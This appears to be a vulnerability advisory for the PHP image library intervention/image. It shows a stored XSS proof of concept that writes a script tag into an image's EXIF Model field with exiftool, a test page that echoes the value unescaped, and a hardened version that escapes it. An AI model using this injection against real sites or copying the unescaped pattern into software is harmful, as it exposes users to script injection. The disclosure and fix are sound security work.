intervention/image is an image handling and manipulation library. This package is vulnerable to XSS via EXIF data read from an image.
1. Download exiftool (https://exiftool.org/).
2. Install it (https://exiftool.org/install.html).
3. Modify the image to add the 'Model' key with the value '<script>alert(document.domain)</script>'.
4. Open a terminal and change directory to where the image is located.
5. Run this command: 'exiftool -Model="<script>alert(document.domain)</script>" imagefilename.jpg'
6. Move the image into your project root directory.
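Create page.php in the project root with the following code:

```php
<?php
require 'vendor/autoload.php';

// import the Intervention Image Manager Class
use Intervention\Image\ImageManagerStatic as Image;

// same file name as in the exiftool command above
$filename = "./imagefilename.jpg";

// read all existing data into an array
$data = Image::make($filename)->exif();

// read model of the camera
$name = Image::make($filename)->exif('Model');

// the EXIF value is printed as-is, without HTML escaping
echo $name;
```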
Start PHP's built-in web server from the project root:

```
php -S 127.0.0.1:8080
```

Open http://127.0.0.1:8080/page.php to trigger the XSS payload.
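A hardened variant of the page above, added here as an example (it is not part of the original report or of intervention/image): every EXIF tag name and value is HTML-escaped before it is printed, including nested sections and binary tags. `exif_to_html` is a hypothetical helper name; the code assumes PHP 8, the same project layout, and the image file from the steps above.

```php
<?php
declare(strict_types=1);

require 'vendor/autoload.php';

use Intervention\Image\ImageManagerStatic as Image;

/**
 * Hypothetical helper: convert any EXIF value to text that is safe inside
 * HTML element content or a quoted attribute value.
 */
function exif_to_html(mixed $value): string
{
    if (is_array($value)) {
        // Nested sections (for example COMPUTED) become "key: value" pairs,
        // with keys and values escaped individually.
        $parts = [];
        foreach ($value as $key => $item) {
            $parts[] = exif_to_html((string) $key) . ': ' . exif_to_html($item);
        }
        return implode(', ', $parts);
    }

    // ENT_QUOTES escapes both quote styles. ENT_SUBSTITUTE replaces invalid
    // UTF-8 (common in binary tags) instead of returning an empty string.
    return htmlspecialchars(
        (string) $value,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
}

$filename = './imagefilename.jpg';

// exif() may return a non-array when the file carries no readable EXIF data.
$exif = Image::make($filename)->exif();
if (!is_array($exif)) {
    $exif = [];
}

header('Content-Type: text/html; charset=UTF-8');

echo '<dl>';
foreach ($exif as $tag => $value) {
    echo '<dt>' . exif_to_html((string) $tag) . '</dt>';
    echo '<dd>' . exif_to_html($value) . '</dd>';
}
echo '</dl>';
```

With the image prepared in the steps above, the Model value is rendered as literal text (`&lt;script&gt;...`) instead of being parsed as markup.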